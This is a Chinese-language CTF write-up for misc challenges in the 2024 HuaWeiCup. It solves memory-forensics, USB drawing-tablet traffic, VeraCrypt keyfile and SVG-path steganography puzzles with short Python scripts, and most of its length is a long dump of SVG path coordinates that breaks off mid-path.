作者: AndyNoel

一杯未尽,离怀多少。

2024 HuaWeiCup misc partly WriteUp

Draw_what_you_like

flag1

在桌面上有flag.txt,直接vol提取

image

image

flag2

搜索flag2,发现有flag2.zip

image

提取出来,里面有一个sqlite文件

image

发现有密码Digital5211314

桌面上有一个draw.zip​文件,提取出来,密码同上

有流量包,是数位板流量,用脚本进行处理:

import os
import matplotlib.pyplot as plt
os.system("tshark -r draw.pcap -T fields -e usbhid.data| sed '/^\s*$/d' > 1.txt")
data=[]
with open('1.txt',"r") as f:
    for line in f.readlines():
        if line[16:18] !="00":
            data.append(line)
X = []
Y = []
for line in data:
        x0=int(line[4:6],16)
        x1=int(line[6:8],16)
        x=x0+x1*256
        y0=int(line[8:10],16)
        y1=int(line[10:12],16)
        y=y0+y1*256
        X.append(x)
        Y.append(-y)
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.set_title("result")
ax1.scatter(X, Y, c='b', marker='o')
plt.show()

image

flag3

附件给了secret.zip​,观察大小刚好是50mb,怀疑是VC容器

在查看文件时发现有一个打什么CTF.jpg​文件

image

提取出来,winhex打开删除多余的空字符,作为密钥文件加载secret.zip

image

flag03:Verakey_graph}

Secret of the Varied Gif

binwalk分离出一个decode,是SVG路径数据,写脚本处理:

import matplotlib.pyplot as plt
from svg.path import parse_path, Line, CubicBezier, QuadraticBezier, Arc
# 定义SVG路径数据,每个子路径作为一个列表元素
svg_paths = [['m320.66772,62.66697c0,0 0,0.59068 0,1.77203c0,2.36269 0,5.90674 0,8.26943c0,3.54405 0,8.26944 0,10.63214c0,2.95337 0,5.90674 0,10.04146c0,3.54405 0,5.31607 0,7.67877c0,1.18135 0,3.54404 0,5.31606c0,1.77203 0,3.54405 0,4.7254c0,1.18135 0,2.95337 0,4.13471c0,1.18135 0,2.3627 0,3.54405c0,0.59067 0,2.36269 0,3.54404c0,0.59067 0,2.36269 0,2.95337c0,1.77203 0,2.95338 0,4.13472c0,1.77202 0,3.54404 0,4.72539c0,1.18135 0,2.95338 0,4.13472c0,1.77202 0,2.95337 0,4.13471c0,1.18135 0,2.3627 0,3.54405c0,1.18135 0,2.36269 0,3.54404c0,1.18135 0,2.36269 0,3.54404c0,1.18136 0,1.18136 0,2.3627c0,1.18135 0,1.77202 0,2.36269c0,1.18135 0,1.77202 0,2.36269c0,1.18135 0,1.77202 0,2.95337c0,0.59068 0,1.18136 0,1.77203c0,0.59067 0,1.18135 0,1.77202c0,0.59067 0,0.59067 0,2.36269c0,0.59067 0,1.18135 0,1.77202c0,0 0,0.59067 0,1.18135c0,0 -0.34444,0.48657 -0.70833,1.77203c-0.16275,0.57487 -0.54214,0.6806 0,1.77202c0.38335,0.77175 0.70833,1.18135 0.70833,1.18135c-1.41667,0 -1.41667,0 -2.125,0c-0.70833,0 -0.70833,0 -1.41667,0c-0.70833,0 -0.70833,0 -1.41667,0c-0.70833,0 -2.83333,0 -3.54167,0c-1.41669,0 -2.12502,0 -2.83336,0c-1.41667,0 -2.125,0 -3.54167,0c-0.70833,0 -0.70833,0 -2.125,0c0,0 -0.70833,0 -1.41667,0c-0.70833,0 -1.41667,0 -1.41667,0c-0.70833,0 -1.41667,0 -2.125,0c-0.70833,0 -1.41667,0 -2.125,0c0,0 -0.70833,0 -1.41667,0c0,0 -0.70833,0 -2.125,0c-0.70833,0 -2.125,0 -2.125,0c-0.70833,0 -2.125,0 -2.83336,0c0,0 -1.41667,0 -2.125,0c-0.70833,0 -0.70833,0 -1.41667,0c-0.70833,0 -0.70833,0 -2.125,0c0,0 -1.41667,0 -2.125,0c-0.70833,0 -2.125,0 -2.83333,0c-1.41667,0 -2.125,0 -2.125,0c-1.41667,0 -2.125,0 -2.83333,0c-0.70833,0 -1.41667,0 -1.41667,0c-0.70833,0 -2.125,0 -2.83333,0c-1.41667,0 -1.41667,0 -2.12502,0c-1.41667,0 -2.125,0 -3.54167,0c0,0 -0.70833,0 -2.125,0c-0.70833,0 -2.125,0 -2.125,0c-0.70833,0 -2.125,0 -2.83333,0c0,0 -2.125,0 -3.54167,0c-0.70833,0 -2.125,0 -3.54167,0c-1.41667,0 -1.41667,0 -2.125,0c-0.70833,0 -1.41668,0 -2.12501,0c-1.41667,0 -2.125,0 -2.83333,0c-0.70833,0 -1.41667,0 -1.41667,0c-0.70833,0 -1.41668,0 -2.12501,0c-0.70833,0 -1.41667,0 -2.125,0l0,0'], ['m518.66791,60.66697c0,0 0,0.59067 0,1.77203c0,2.36269 0,5.90674 0,8.26943c0,3.54405 0,8.26944 0,10.63214c0,2.95337 0,5.90674 0,10.04146c0,3.54405 0,5.31607 0,7.67877c0,1.18135 0,3.54404 0,5.31606c0,1.77203 0,3.54405 0,4.72539c0,1.18135 0,2.95337 0,4.13472c0,1.18135 0,2.36271 0,3.54405c0,0.59067 0,2.36269 0,3.54404c0,0.59067 0,2.36269 0,2.95337c0,1.77203 0,2.95337 0,4.13472c0,1.77202 0,3.54404 0,4.72539c0,1.18135 0,2.95338 0,4.13473c0,1.77202 0,2.95337 0,4.13472c0,1.18135 0,2.3627 0,3.54405c0,1.18135 0,2.36269 0,3.54404c0,1.18135 0,2.36269 0,3.54404c0,1.18136 0,1.18136 0,2.36271c0,1.18135 0,1.77202 0,2.36269c0,1.18135 0,1.77202 0,2.36269c0,1.18135 0,1.77202 0,2.95337c0,0.59068 0,1.18135 0,1.77203c0,0.59067 0,1.18135 0,1.77202c0,0.59067 0,0.59067 0,2.36269c0,0.59067 0,1.18135 0,1.77202c0,0 0,0.59067 0,1.18135c0,0 -0.29581,0.48658 -0.60833,1.77203c-0.13978,0.57487 -0.46561,0.6806 0,1.77202c0.32922,0.77175 0.60833,1.18135 0.60833,1.18135c-1.21667,0 -1.21667,0 -1.825,0c-0.60833,0 -0.60833,0 -1.21667,0c-0.60833,0 -0.60833,0 -1.21667,0c-0.60833,0 -2.43333,0 -3.04167,0c-1.21669,0 -1.82502,0 -2.43336,0c-1.21667,0 -1.825,0 -3.04167,0c-0.60833,0 -0.60833,0 -1.825,0c0,0 -0.60833,0 -1.21667,0c-0.60833,0 -1.21667,0 -1.21667,0c-0.60833,0 -1.21667,0 -1.825,0c-0.60833,0 -1.21667,0 -1.825,0c0,0 -0.60833,0 -1.21667,0c0,0 -0.60833,0 -1.825,0c-0.60833,0 -1.825,0 -1.825,0c-0.60833,0 -1.825,0 -2.43335,0c0,0 -1.21667,0 -1.825,0c-0.60833,0 -0.60833,0 -1.21667,0c-0.60833,0 -0.60833,0 -1.825,0c0,0 -1.21667,0 -1.825,0c-0.60833,0 -1.825,0 -2.43333,0c-1.21667,0 -1.825,0 -1.825,0c-1.21667,0 -1.825,0 -2.43333,0c-0.60833,0 -1.21667,0 -1.21667,0c-0.60833,0 -1.825,0 -2.43333,0c-1.21667,0 -1.21667,0 -1.82502,0c-1.21667,0 -1.825,0 -3.04167,0c0,0 -0.60833,0 -1.825,0c-0.60833,0 -1.825,0 -1.825,0c-0.60833,0 -1.825,0 -2.43333,0c0,0 -1.825,0 -3.04167,0c-0.60833,0 -1.825,0 -3.04167,0c-1.21667,0 -1.21667,0 -1.825,0c-0.60833,0 -1.21667,0 -1.82501,0c-1.21667,0 -1.825,0 -2.43333,0c-0.60833,0 -1.21667,0 -1.21667,0c-0.60833,0 -1.21668,0 -1.82501,0c-0.60833,0 -1.21667,0 -1.825,0l0,0'], ['m350.66769,62.66697c0,0 0,0.58549 0,1.75648c0,2.34197 0,5.85492 0,8.19689c0,3.51296 0,8.1969 0,10.53888c0,2.92746 0,5.85493 0,9.95337c0,3.51296 0,5.26944 0,7.61141c0,1.17098 0,3.51295 0,5.26943c0,1.75648 0,3.51296 0,4.68394c0,1.17098 0,2.92746 0,4.09845c0,1.17098 0,2.34198 0,3.51297c0,0.58549 0,2.34197 0,3.51295c0,0.58549 0,2.34197 0,2.92746c0,1.75648 0,2.92747 0,4.09845c0,1.75648 0,3.51295 0,4.68394c0,1.17098 0,2.92747 0,4.09846c0,1.75648 0,2.92746 0,4.09845c0,1.17098 0,2.34197 0,3.51296c0,1.17098 0,2.34197 0,3.51295c0,1.17098 0,2.34197 0,3.51295c0,1.171 0,1.171 0,2.34198c0,1.17098 0,1.75648 0,2.34197c0,1.17098 0,1.75648 0,2.34197c0,1.17098 0,1.75648 0,2.92746c0,0.5855 0,1.17099 0,1.75648c0,0.58549 0,1.17098 0,1.75648c0,0.58549 0,0.58549 0,2.34197c0,0.58549 0,1.17098 0,1.75648c0,0 0,0.58549 0,1.17098c0,0 0.31202,0.48231 0.64167,1.75649c0.14744,0.56983 0.49113,0.67463 0,1.75648c-0.34726,0.76498 -0.64167,1.17098 -0.64167,1.17098c1.28333,0 1.28333,0 1.925,0c0.64167,0 0.64167,0 1.28333,0c0.64167,0 0.64167,0 1.28333,0c0.64167,0 2.56667,0 3.20834,0c1.28336,0 1.92503,0 2.56669,0c1.28333,0 1.925,0 3.20834,0c0.64167,0 0.64167,0 1.925,0c0,0 0.64167,0 1.28333,0c0.64167,0 1.28333,0 1.28333,0c0.64167,0 1.28333,0 1.925,0c0.64167,0 1.28333,0 1.925,0c0,0 0.64167,0 1.28333,0c0,0 0.64167,0 1.925,0c0.64167,0 1.925,0 1.925,0c0.64167,0 1.925,0 2.56669,0c0,0 1.28333,0 1.925,0c0.64167,0 0.64167,0 1.28333,0c0.64167,0 0.64167,0 1.925,0c0,0 1.28333,0 1.925,0c0.64167,0 1.925,0 2.56667,0c1.28333,0 1.925,0 1.925,0c1.28333,0 1.925,0 2.56667,0c0.64167,0 1.28333,0 1.28333,0c0.64167,0 1.925,0 2.56667,0c1.28333,0 1.28333,0 1.92502,0c1.28333,0 1.925,0 3.20834,0c0,0 0.64167,0 1.925,0c0.64167,0 1.925,0 1.925,0c0.64167,0 1.925,0 2.56667,0c0,0 1.925,0 3.20834,0c0.64167,0 1.925,0 3.20834,0c1.28333,0 1.28333,0 1.925,0c0.64167,0 1.28334,0 1.92501,0c1.28333,0 1.925,0 2.56667,0c0.64167,0 1.28333,0 1.28333,0c0.64167,0 1.28335,0 1.92501,0c0.64167,0 1.28333,0 1.925,0l0,0'], ['m560.0764,60.66697c0,0 1.28169,0 1.28169,0c0.64085,0 1.28169,0 2.56338,0c1.28169,0 1.28169,0 1.92254,0c0.64085,0 1.28169,0 1.92254,0c0,0 1.28169,0 1.28169,0c1.28169,0 1.28169,0 2.56338,0c0,0 1.28169,0 1.28169,0c0.64085,0 1.28169,0 1.28169,0c0.64085,0 1.28169,0 1.28169,0c0.64085,0 1.28169,0 1.28169,0c0.64085,0 1.28169,0 1.92254,0c0.64085,0 0.64085,0 1.92254,0c0,0 0.64085,0 1.92254,0c0.64088,0 1.92257,0 1.92257,0c0.64085,0 1.28169,0 1.92254,0c0.64085,0 0.64085,0 1.92254,0c0.64085,0 1.92254,0 2.56338,0c0,0 1.28169,0 3.20423,0c0.64085,0 1.92254,0 1.92254,0c0.64085,0 1.28169,0 1.92254,0c0.64085,0 1.92254,0 2.56338,0c0.64085,0 1.28169,0 1.92254,0c0,0 1.28169,0 1.28169,0c1.28169,0 1.92254,0 2.56338,0c0.64085,0 1.28169,0 1.92254,0c0.64085,0 1.92254,0 2.56338,0c0.64085,0 1.92254,0 1.92254,0c0.64085,0 1.28169,0 1.28169,0c0.64085,0 1.28169,0 1.92254,0c0.64085,0 1.28169,0 1.92254,0c0,0 0.64085,0 1.28169,0c0.64085,0 1.28169,0 1.92254,0c0.64085,0 0.64085,0 1.92257,0c0.64085,0 1.28169,0 2.56338,0c0,0 1.28169,0 1.92254,0c0.64085,0 1.28169,0 1.92254,0c0,0 0.64085,0 1.28169,0c0,0 0.64085,0 1.28169,0c0.64085,0 1.28169,0 1.28169,0c1.28169,0 1.28169,0 1.92254,0c0.64085,0 0.64085,0 1.28169,0c0.64085,0 0.64085,0 1.92254,0c0,0 0.64085,0 1.28169,0c0.64085,0 1.28169,0 1.28169,0c0.64085,0 1.28169,0 1.28169,0c0.64085,0 1.28169,0 1.92254,0c0.64085,0 0.64085,0.61979 0.64085,1.23958c0,0.61979 0,1.23959 0,1.23959c0,0.61979 0,1.23958 0,1.85938c0,0.61979 -0.29402,0.42979 -0.64085,1.23959c-0.24525,0.57262 0,0.61979 0,1.23959c0,0.61979 0.14723,1.25616 0,1.85938c-0.32922,1.34882 -0.64085,1.23958 -0.64085,1.85938c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,1.23958 0,1.23958c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,1.23958 0,1.85938c0,0 -0.52831,0.06067 -1.28169,1.23958c-0.67382,1.05445 0,1.85938 0,2.47917c0,0 0,1.23958 0,1.23958c0,1.23958 0,1.85938 0,2.47917c0,0 0,1.23959 0,1.85938c0,0.61979 0,1.23958 0,1.85938c0,0 0,1.23958 0,1.23958c0,0.6198 0,1.23959 0,1.23959c0,0.61979 0,1.23958 0,2.47917c0,0 0,0.61979 0,1.23959c0,0.61979 0,1.23958 0,1.23958c0,1.23958 0,1.23958 0,1.85938c0,0.61979 0,1.23958 0,1.85938c0,1.23958 0,1.23958 0,1.23958c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,0.61979 0,1.23958c0,0.6198 0,0.6198 0,1.23959c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,1.23958 -0.64085,2.47917c0,0 0,0.61979 0,1.23958c0,0 0,0.61979 0,1.23959c0,0 0.24525,0.66697 0,1.23958c-0.34682,0.8098 -0.64085,1.23958 -0.64085,1.85938c0,0.61979 0,0.61979 0,1.23958c0,1.23958 0,1.85938 0,2.47917c0,0.61979 -0.64085,0.61979 -0.64085,1.23958c0,0.61979 0,1.23959 0,1.85938c0,0.61979 -0.18771,0.80132 -0.64085,1.23958c-0.90627,0.87652 0.67382,1.42471 0,2.47917c-0.75338,1.17891 -1.28169,1.23958 -1.28169,1.23958c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,1.23958 0,1.85938c0,0.6198 0,1.23959 0,1.85938c0,0.61979 0,1.23958 0,1.85938c0,0 0,1.23958 0,1.23958c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,0.61979 0,1.85938c0,0 0,0.61979 0,1.23958c0,0 0,0.6198 0,1.23959c0,0 0,1.23958 0,1.23958c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,0.61979 0,1.85938c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,1.85938 0,2.47918c0,0.61979 0,1.23958 0,1.85938c0,0 0,1.23958 0,1.85938c0,0.61979 -0.24525,1.28677 0,1.85938c0.34682,0.8098 0.64085,1.23958 0.64085,1.23958c0,0.61979 0,1.23958 0,1.85938c0,0.6198 0,0.6198 0,1.23959c0,0.61979 0,0.61979 0,1.23958c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,1.23958 0,1.23958c0,0.61979 0,1.23958 0,1.85938c0,0.61979 0,1.23958 0,1.85938c0,0 0,0.61979 0,1.23959c0,0 0,0.61979 0,1.23958c0,0.61979 -0.29402,1.04958 -0.64085,1.85938c-0.24525,0.57261 0,0.61979 0,1.23958c0,0.61979 0,1.23958 0,1.85938c0,0 -0.64085,0 -1.28169,0.61979c0,0 -1.28169,0 -1.92254,0c-1.92254,0 -3.20423,0 -3.84507,0c-1.28169,0 -1.92254,0 -3.20423,0c0,0 -0.64085,0 -1.28169,0c-0.64085,0 -1.28169,0 -1.92254,0c-0.64085,0 -1.28169,0 -1.92254,0c-0.64088,0 -1.28173,0 -1.28173,0c-1.28169,0 -1.28169,0 -1.92254,0c-0.64085,0 -1.92254,0 -1.92254,0c-0.64085,0 -1.28169,0 -3.20423,0c-0.64085,0 -1.92254,0 -2.56338,0c-0.64085,0 -1.92254,0 -2.56338,0c-0.64085,0 -1.92254,0 -3.20423,0.61979c-1.28169,0.61979 -2.56338,0.61979 -3.20423,0.61979c-0.64085,0 -1.28169,0 -1.92254,0c-0.64085,0 -1.28169,0 -1.28169,0c-1.28169,0 -1.92254,0 -2.56338,0c-1.28169,0 -1.28169,0 -1.92254,0c-1.28169,0 -1.92254,0 -3.20423,0c0,0 -1.28169,0 -1.92254,0c-0.64085,0 -1.92254,0 -3.20423,0c-0.64085,0 -1.28169,0 -2.56338,0c-0.64085,0 -1.28169,0 -1.92257,0c-0.64085,0 -1.28169,0 -1.92254,0c-0.64085,0 -1.28169,0 -1.28169,0c-0.64085,0 -1.28169,0 -3.20423,0c-0.64085,0 -0.64085,0 -1.92254,0c-0.64085,0 -1.28169,0 -1.28169,0c-1.28169,0 -2.56338,0 -3.20423,0c-0.64085,0 -1.28169,0 -1.92254,0c0,0 -0.64085,0 -1.28169,0c0,0 -0.64085,0 -1.28169,0c-1.28169,0 -1.92254,0 -2.56338,0c-1.28169,0 -2.56338,0 -2.56338,0c-0.64085,0 -1.28169,0 -1.92254,0c-0.64085,0 -0.64085,0.61979 -1.28169,0.61979c-0.64085,0 -0.64085,0 -1.92254,0l-0.64085,0l-0.64085,0'], ['m674.43176,77.337c0.57234,-0.49745 1.14469,-0.49745 1.71703,-0.49745c1.71703,0 2.28937,0 3.4341,0c1.14469,0 2.28937,0 2.86172,0c1.14469,0 1.71703,0 2.28937,0c1.14469,0 1.71703,0 2.28937,0c0.57234,0 0.57234,0 1.71703,0c0.57234,0 1.14469,0 1.71703,0c0.57234,0 1.14469,0 1.71703,0c1.14469,0 1.71703,0 2.28937,0c0,0 0.57234,0 1.14469,0c0.57234,0 1.14469,0 1.71703,0c0.57234,0 0.57234,0 2.28937,0c0.57234,0 1.14469,0 1.71703,0c0,0 1.14469,0 1.71703,0c0.57234,0 1.71703,0 2.86172,0c0.57234,0 1.14469,0 2.28937,0c0,0 0.57234,0 2.28937,0c0,0 2.28937,0 3.43406,0c1.14472,0 2.86175,0 4.00644,0c0.57234,0 2.33294,0.19037 2.86172,0c0.74781,-0.26922 1.71703,-0.49745 2.28937,-0.49745c0.57234,0 1.14469,0 1.14469,0c0,-0.49746 1.14469,-0.49746 1.71703,-0.49746c0.57234,0 1.71703,-0.49745 2.28937,-0.49745c1.71703,0 2.86172,0 3.43406,0c0.57234,0 1.73233,0.11429 2.28937,0c1.24561,-0.25556 1.71707,-0.99491 1.71707,-0.99491c1.14469,0 2.28937,0 3.43406,0c0,0 1.18828,0.19037 1.71703,0c0.74778,-0.26922 1.71703,-0.49746 2.28937,-0.49746c1.14469,0 1.71703,-0.49745 2.86172,-0.49745c1.14469,0 2.11394,-0.22823 2.86172,-0.49745c1.05756,-0.38073 1.71703,0 3.43406,0c1.14469,0 2.28937,0 2.86172,0c1.14469,0 1.71703,0 2.28937,0c0.57234,0 1.14469,0 2.28937,0c0,0 0.57234,0 1.14469,0c0.57234,0 1.14469,0 2.28937,0c0,0 0.57234,0 1.14469,0c0.57234,0 1.14469,0 1.14469,0c1.14469,0 1.71703,0 2.86172,0c0.57234,0 1.14469,0 1.71703,0c1.14469,0 1.71703,0 2.28937,0c0.57234,0 1.14469,0 2.28937,0c1.14469,0 1.71703,0 2.28937,0c1.14469,0 1.71703,0 2.28937,0c0.57234,0 1.14469,0 1.71703,0c0.57234,0 0.57234,0 1.71703,0c0.57234,0 1.71703,0 2.28937,0c0,0 0.73995,-0.35175 1.14469,0c0.40473,0.35175 0,0.99491 0,1.49237c0,1.49236 0,1.98982 0,2.98473c0,1.49237 -0.4644,2.55426 -1.71703,3.97964c-1.09858,1.25015 -0.24062,2.52996 -0.57234,3.48219c-0.59798,1.71664 -0.61866,2.5405 -1.14469,4.47709c-0.29407,1.08259 -1.14469,2.98473 -1.14469,3.97964c0,1.98982 0.43296,3.51809 0,5.472c-0.58289,2.63054 -1.71703,3.48219 -1.71703,5.47201c0,0.99491 -0.57234,2.48727 -0.57234,3.48218c0,1.98982 0.52602,2.54051 0,4.4771c-0.29407,1.08259 -0.88171,2.01643 -1.14469,2.98473c-0.29407,1.08259 -1.14469,3.97964 -1.14469,4.97455c0,0.99491 0,2.98473 0,3.48218c0,1.49236 -0.85474,2.92432 -1.14469,4.4771c-0.09166,0.49103 0,1.98982 0,2.98473c0,0.99491 0.13149,2.50059 0,2.98474c-0.29407,1.08259 -0.29728,2.00909 -0.57234,3.48218c-0.28994,1.55278 0.08475,2.10342 -0.57234,3.48218c-0.30972,0.64996 -0.85474,1.43196 -1.14469,2.98474c-0.09166,0.49103 -0.27828,1.90214 -0.57234,2.98473c-0.26298,0.9683 0.13149,2.50059 0,2.98474c-0.29407,1.08259 -0.57234,1.98982 -0.57234,1.98982c0,0.99491 0,1.49236 0,2.98473c0,0 0,0.99491 0,1.49236c0,1.49237 0.21903,2.0277 0,2.48728c-0.30972,0.64996 -0.57234,0.99491 -0.57234,0.99491c0,0.99491 0,1.98982 0,2.48727c0,0.49745 0,0.49745 0,1.49236c0,0.49745 0,0.99492 0,0.99492c0,0.49745 0,0.99491 0,0.99491c0,0.99491 -0.57234,0.99491 -0.57234,0.99491c-1.14469,0 -4.57875,0 -6.86812,0c-2.86172,0 -6.86812,0 -9.15749,0c-2.86172,0 -6.29578,0 -8.58515,0c-2.86172,0 -5.15109,0 -7.44046,0c-2.28937,0 -3.43406,0 -5.72347,0c-1.14469,0 -2.28937,0 -4.0064,0c-0.57234,0 -2.28937,0 -3.43406,0c-0.57234,0 -1.71703,0 -2.86172,0c-1.14469,0 -3.43406,0 -4.57875,0c-1.14469,0 -3.43406,0 -4.57878,0c-1.14469,0 -3.43406,0 -4.57875,0c-1.14469,0 -2.86172,0 -4.57875,0c0,0 -1.71703,0.49745 -2.28937,0.49745c-1.14469,0 -2.28937,0 -4.0064,0c-0.57234,0 -2.30467,0.38316 -2.86172,0.49745c-1.24557,0.25557 -2.28937,0.99491 -3.43406,0.99491c-0.57234,0 -1.71703,0 -2.28937,0c-0.57234,0 -1.14469,0 -1.71703,0c-0.57234,0 -1.14469,0 -1.71703,0c-0.57234,0 -1.14469,0 -2.28937,0c-0.57234,0 -1.14469,0 -1.14469,0c-0.57234,0 -1.14469,0 -1.14469,0c-1.14469,0.49745 -1.71703,0.49745 -2.28937,0.49745c0,0 -0.57234,0 -1.14472,0c0,0 -1.14469,0.49745 -1.14469,0.49745c-0.57234,0 -0.96922,0.76668 -1.71703,0.49745c-0.52878,-0.19037 0,-1.49236 0,-1.98982c0,-0.99491 0,-2.48727 0,-3.48218c0,-0.99492 0,-1.98983 0,-2.98474c0,-0.49745 0,-1.98982 0,-1.98982c0,-0.99491 0,-1.49236 0,-2.98473c0,0 0,-0.49746 0,-2.98474c0,-0.49745 0.27831,-1.90214 0.57234,-2.98473c0.26301,-0.9683 0,-2.48728 0,-2.98474c0,-0.99491 0,-1.98982 0,-2.98473c0,-0.99491 0,-2.48727 0,-3.48218c0,-0.99492 0,-1.98983 0,-2.48728c0,-0.99491 0,-2.98473 0,-3.48218c0,-0.99491 0,-1.98982 0,-2.98474c0,-0.49745 0,-2.48727 0,-3.97964c0,-1.49236 0,-1.98982 0,-2.98473c0,-0.49746 0,-1.98983 0,-2.48728c0,-1.49236 0.52518,-1.68481 1.14469,-2.98473c0.43806,-0.91918 0,-1.98982 0,-2.98474c0,-1.49236 0.28243,-1.92941 0.57234,-3.48218c0.09166,-0.49103 0.57234,-0.49745 0.57234,-1.49236c0,-0.99491 0,-1.98982 0,-2.48728c0,-0.49745 1.14472,-2.48728 1.14472,-2.98473c0,-1.49236 0,-1.98982 0,-2.98473c0,-0.49745 0,-1.49236 0,-2.48727c0,-0.49745 0,-0.99491 0,-1.98982c0,-0.99491 0,-1.98982 0,-2.48727c0,-1.49237 0,-1.98982 0,-2.98473c0,-0.49745 0,-1.49237 0,-1.98982c0,-0.49745 0,-0.99491 0,-1.98982c0,-0.49745 0,-0.99491 0,-1.49237c0,-0.49745 0,-0.99491 0,-1.49236c0,-0.49745 0,-0.99491 0,-1.49236c0,-0.49745 0,-0.99491 0,-0.99491c0,-0.49745 0,-0.99491 0,-0.99491c0,-0.49745 0,-0.99491 0,-1.49236c0,-0.49745 0,-0.49745 0,-1.49237c0,0 0,-0.49746 0,-0.99491c0,-0.49745 0,-0.99491 0,-0.99491l0,-0.99491l-0.57234,-0.49745l0,-0.49745'], ['m1097.66841,53.66696c0,0 0,0.62695 0,1.88084c0,2.50777 0,6.26943 0,8.7772c0,3.76167 0,8.77721 0,11.285c0,3.13471 0,6.26943 0,10.65803c0,3.76167 0,5.6425 0,8.15027c0,1.25389 0,3.76167 0,5.64249c0,1.88083 0,3.76167 0,5.01556c0,1.25388 0,3.13471 0,4.3886c0,1.25389 0,2.50778 0,3.76168c0,0.62694 0,2.50777 0,3.76165c0,0.62694 0,2.50777 0,3.13471c0,1.88083 0,3.13472 0,4.38861c0,1.88083 0,3.76167 0,5.01555c0,1.25389 0,3.13472 0,4.38862c0,1.88082 0,3.13471 0,4.3886c0,1.25389 0,2.50778 0,3.76167c0,1.25389 0,2.50777 0,3.76167c0,1.25388 0,2.50777 0,3.76165c0,1.2539 0,1.2539 0,2.50778c0,1.25389 0,1.88083 0,2.50777c0,1.25388 0,1.88083 0,2.50777c0,1.25388 0,1.88083 0,3.13471c0,0.62695 0,1.25389 0,1.88083c0,0.62694 0,1.25389 0,1.88083c0,0.62694 0,0.62694 0,2.50777c0,0.62694 0,1.25388 0,1.88083c0,0 0,0.62694 0,1.25388c0,0 0.38497,0.51646 0.79167,1.88084c0.18191,0.61017 0.60594,0.72239 0,1.88082c-0.42844,0.81915 -0.79167,1.25389 -0.79167,1.25389c1.58334,0 1.58334,0 2.375,0c0.79167,0 0.79167,0 1.58334,0c0.79167,0 0.79167,0 1.58333,0c0.79167,0 3.16667,0 3.95834,0c1.58337,0 2.37502,0 3.1667,0c1.58334,0 2.375,0 3.95834,0c0.79166,0 0.79166,0 2.375,0c0,0 0.79167,0 1.58333,0c0.79167,0 1.58334,0 1.58334,0c0.79166,0 1.58333,0 2.375,0c0.79166,0 1.58333,0 2.375,0c0,0 0.79167,0 1.58333,0c0,0 0.79167,0 2.375,0c0.79167,0 2.37501,0 2.37501,0c0.79166,0 2.375,0 3.16668,0c0,0 1.58334,0 2.375,0c0.79167,0 0.79167,0 1.58334,0c0.79167,0 0.79167,0 2.375,0c0,0 1.58333,0 2.375,0c0.79167,0 2.375,0 3.16667,0c1.58333,0 2.375,0 2.375,0c1.58333,0 2.375,0 3.16667,0c0.79167,0 1.58333,0 1.58333,0c0.79167,0 2.375,0 3.16667,0c1.58334,0 1.58334,0 2.37502,0c1.58334,0 2.375,0 3.95834,0c0,0 0.79166,0 2.375,0c0.79167,0 2.375,0 2.375,0c0.79167,0 2.375,0 3.16667,0c0,0 2.375,0 3.95833,0c0.79167,0 2.37501,0 3.95834,0c1.58333,0 1.58333,0 2.375,0c0.79167,0 1.58334,0 2.37501,0c1.58333,0 2.375,0 3.16667,0c0.79166,0 1.58333,0 1.58333,0c0.79167,0 1.58335,0 2.37501,0c0.79167,0 1.58334,0 2.37501,0l0,0'], ['m819.66669,80c0,0 1.14602,0 1.14602,0c0,1.17493 0,2.34987 0,2.34987c0,2.34987 1.48169,3.86893 2.29203,4.69973c0.81034,0.8308 1.49351,2.07887 2.29203,3.5248c2.32806,4.21557 1.7654,5.93753 2.29203,8.22453c0.58875,2.55695 3.63642,6.87656 4.58406,8.22453c1.49834,2.13132 0.3561,3.61909 1.14602,7.0496c0.58875,2.55695 3.43805,4.69973 3.43805,5.87466c0,1.17493 0.19837,3.35177 1.14602,4.69973c1.49834,2.13132 1.93971,3.74334 3.43805,5.87466c0.94765,1.34797 3.43805,5.87466 3.43805,5.87466c1.14602,1.17493 0.70745,3.61424 1.14602,4.69973c1.24044,3.07025 2.29203,2.34987 2.29203,3.5248c0,1.17493 1.14602,2.34987 2.29203,3.5248c0,0 1.34439,1.00191 2.29203,2.34987c1.49834,2.13132 2.29203,2.34987 2.29203,3.5248c0,1.17493 1.14602,1.17493 1.14602,2.34987c0,1.17493 1.14602,1.17493 1.14602,1.17493c1.14602,1.17493 1.48169,3.86893 2.29203,4.69973c0.81034,0.8308 1.14602,1.17493 2.29203,2.34987c0,0 1.67181,-0.36019 2.29203,1.17493c0.43857,1.08549 0,1.17493 1.14602,1.17493c1.14602,0 2.62771,0.8308 3.43805,0c1.62068,-1.66161 1.14602,-3.5248 2.29203,-4.69973c0,0 2.62771,-1.51906 3.43805,-2.34987c0.81034,-0.8308 1.14602,-2.34987 1.14602,-2.34987c0,-1.17493 0.79369,-2.56841 2.29203,-4.69973c0.94765,-1.34796 1.48169,-2.69399 2.29203,-3.5248c0.81034,-0.8308 2.29203,-1.17493 2.29203,-1.17493c0,-1.17493 1.14602,-2.34987 3.43805,-4.69973c1.14602,-1.17493 0.54349,-2.52535 1.14602,-3.5248c1.34725,-2.23486 3.08572,-3.74334 4.58406,-5.87466c1.89529,-2.69593 2.29203,-4.69973 3.43805,-5.87466c3.43805,-3.5248 3.29787,-5.95221 4.58406,-8.22453c2.07394,-3.664 3.43805,-4.69973 4.58406,-7.0496c1.14602,-2.34987 -0.05897,-2.70082 1.14602,-4.69973c1.34725,-2.23486 3.34362,-1.62948 4.58406,-4.69973c0.87714,-2.17099 2.46319,-4.08203 3.43805,-4.69973c2.17984,-1.38121 1.34439,-3.35177 2.29203,-4.69973c1.49834,-2.13132 1.85346,-4.78916 2.29203,-5.87466c0.62022,-1.53513 1.23324,-3.07517 2.29203,-3.5248c1.49736,-0.63587 1.14602,-2.34987 1.14602,-2.34987l0,-1.17493l0,-1.17493'], ['m958.66669,166c1.22353,-4.35211 4.08349,-7.70326 6.11765,-11.60563c0.90966,-1.7452 2.67991,-4.18024 4.89412,-8.70423c1.37318,-2.80566 3.88238,-7.03988 4.89412,-8.70423c1.59968,-2.63157 2.18994,-5.91661 3.67059,-10.15493c1.04699,-2.99695 3.6157,-5.14878 